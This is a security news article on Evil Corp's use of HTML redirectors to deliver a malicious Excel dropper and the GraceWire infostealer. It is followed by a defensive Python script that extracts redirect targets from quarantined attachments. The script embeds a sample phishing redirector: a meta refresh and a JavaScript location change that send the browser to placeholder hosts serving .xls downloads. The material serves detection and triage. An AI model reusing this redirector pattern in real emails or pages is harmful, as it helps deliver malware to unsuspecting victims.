Evil Corp (Dudear) is back in action after a short hiatus, with a technique in its arsenal not previously used by the group to distribute malware. Microsoft on Thursday said that it observed emails from the cybercriminal gang utilizing HTML redirectors.

Microsoft is unclear whether these HTML redirectors are URLs in the body of the email itself or whether they are embedded in an attachment to the email. Regardless, once they are clicked, they automatically download a malicious Excel file. Next, if the victim "enables editing" in the Excel file, the final payload is dropped.

"This is the first time that Dudear is observed using HTML redirectors," according to a tweet by the Microsoft Security Intelligence research team, which also released indicators of compromise (IoCs) for the attack. "The attackers use HTML files in different languages. Notably, they also use an IP trace-back service to track the IP addresses of machines that download the malicious Excel file."

While this is the first time Evil Corp has used this tactic, HTML redirectors, or code that uses meta refresh tags to redirect users to another website, have long been used by other threat actors. Redirector URLs in general are commonly inserted into emails for phishing attacks. For instance, if certain malicious URLs are blocked by web browser phishing filters, attackers would use a redirector URL to bypass these filters and redirect the victim to their phishing landing page. "In case their phishing site is shut down, they can simply change the destination of the redirect to point to another phishing site," according to PhishLabs. "This means that everyone who receives an email with the redirector link and clicks on it will still end up at a phishing site."

The technique is handy because it can enable attackers to avoid the use of emails or attachments containing known malicious content, and also means that they can directly download malicious files onto victims' systems, Roger Grimes, data-driven defense evangelist at KnowBe4, told Threatpost. "A lot of times if you have an anti-malware scanner, it scans for malicious code and may or may not download the redirect," Grimes said. "Redirects also pull the malware right away. This shows constantly moving, trying to stay ahead of the anti-forensics."

(Image caption: HTML redirect from the Evil Corp campaign)

Previously, Evil Corp would distribute malware without HTML redirects, merely using malicious attachments or malicious URLs – which are more easily detected by defensive tools – in emails. The final payload is the GraceWire trojan, an infostealer. Further details about the extent and victims of the campaign were not revealed. Evil Corp has distributed GraceWire in previous campaigns; however, the group is best known for deploying the banking trojan Dridex (also known as Bugat and Cridex), sent via phishing emails. Threatpost has reached out to Microsoft for more insight.

The new campaign uses HTML redirectors attached to emails. When opened, the HTML leads to the download of Dudear, a malicious macro-laden Excel file that drops the payload. In contrast, past Dudear email campaigns carried the malware as an attachment or used malicious URLs.

Microsoft Security Intelligence, January 30, 2020

Evil Corp is a hacking group that has allegedly stolen millions of dollars from victims using the Dridex banking trojan and, previously, the Zeus malware. Evil Corp's previous schemes involved capturing banking credentials and causing banks to make unauthorized electronic funds transfers from unknowing victims' bank accounts.
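The article describes HTML redirectors as attachments that use meta refresh tags (or script) to send the browser on to a spreadsheet download, which is exactly the kind of file a mail gateway or analyst wants to inspect without rendering it. The following is an added example for triaging such an attachment offline; it is not code from the article, from Microsoft or from Threatpost. The sample HTML, its placeholder hosts (`redirector.example`, `mirror.example`) and the file name are constructed for the demonstration and are not indicators from the campaign; the extension list and the `extract_redirects` / `hosts_to_block` helpers are this example's own choices.

```python
"""Defender-side triage of an HTML email attachment: pull out every
redirect destination (meta refresh and script-based) so an analyst can
see where the file would send a victim without opening it in a browser.
Added example; not code from the article or from Microsoft/Threatpost."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample attachment with placeholder domains. It is NOT an
# indicator from the campaign; it only mirrors the shape of a meta-refresh
# redirector that hands the browser a spreadsheet download.
SAMPLE_HTML = """<html><head><meta charset="utf-8">
<meta http-equiv="refresh" content="0; url=http://redirector.example/dl/invoice.xls">
<title>Rechnung</title></head>
<body><p>Bitte warten...</p>
<script>
  setTimeout(function () {
    window.location.href = "http://mirror.example/invoice.xls";
  }, 3000);
</script></body></html>"""

# Extensions that, as a redirect target, mean "this page exists to drop a file".
DOCUMENT_EXTENSIONS = (".xls", ".xlsx", ".xlsm", ".doc", ".docm", ".zip", ".iso", ".exe")

META_REFRESH_RE = re.compile(r"\s*(\d+)\s*;\s*url\s*=\s*['\"]?([^'\"\s]+)", re.I)
SCRIPT_REDIRECT_RES = (
    # location = "..."  /  window.location.href = "..."
    re.compile(r"""location(?:\.href)?\s*=\s*['"]([^'"]+)['"]"""),
    # location.replace("...")  /  location.assign("...")
    re.compile(r"""location\.(?:replace|assign)\s*\(\s*['"]([^'"]+)['"]"""),
)


class RedirectExtractor(HTMLParser):
    """Collects (kind, delay_seconds, url) tuples from an HTML document."""

    def __init__(self):
        super().__init__()
        self.found = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            m = META_REFRESH_RE.match(a.get("content", ""))
            if m:  # a refresh without url= only reloads the page; ignore it
                self.found.append(("meta-refresh", int(m.group(1)), m.group(2)))
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            for rx in SCRIPT_REDIRECT_RES:
                for m in rx.finditer(data):
                    self.found.append(("script", None, m.group(1)))


def extract_redirects(html_text):
    """Return a list of dicts describing each redirect found in the attachment."""
    parser = RedirectExtractor()
    parser.feed(html_text)
    parser.close()
    results = []
    for kind, delay, url in parser.found:
        parsed = urlparse(url)
        results.append({
            "kind": kind,
            "delay": delay,          # seconds for meta refresh, None for script
            "url": url,
            "host": parsed.hostname or "",
            # an immediate hop straight to a document is the pattern the article describes
            "drops_document": parsed.path.lower().endswith(DOCUMENT_EXTENSIONS),
        })
    return results


def hosts_to_block(html_text):
    """Distinct destination hosts, for proxy or mail-gateway blocklist review."""
    return sorted({r["host"] for r in extract_redirects(html_text) if r["host"]})


if __name__ == "__main__":
    for r in extract_redirects(SAMPLE_HTML):
        print(f"{r['kind']:13} delay={str(r['delay']):5} host={r['host']:20} "
              f"document={r['drops_document']}  {r['url']}")
    print("hosts:", hosts_to_block(SAMPLE_HTML))
```

Because the parser never fetches anything, it is safe to run over quarantined attachments in bulk; a zero-second meta refresh whose target ends in a spreadsheet or archive extension is a strong reason to hold the message, and the extracted hosts can be checked against the IoCs Microsoft published rather than hard-coded here. Script-based redirects that build the URL dynamically will not be caught by the literal-string regexes, so a miss from this script is not a clean bill of health.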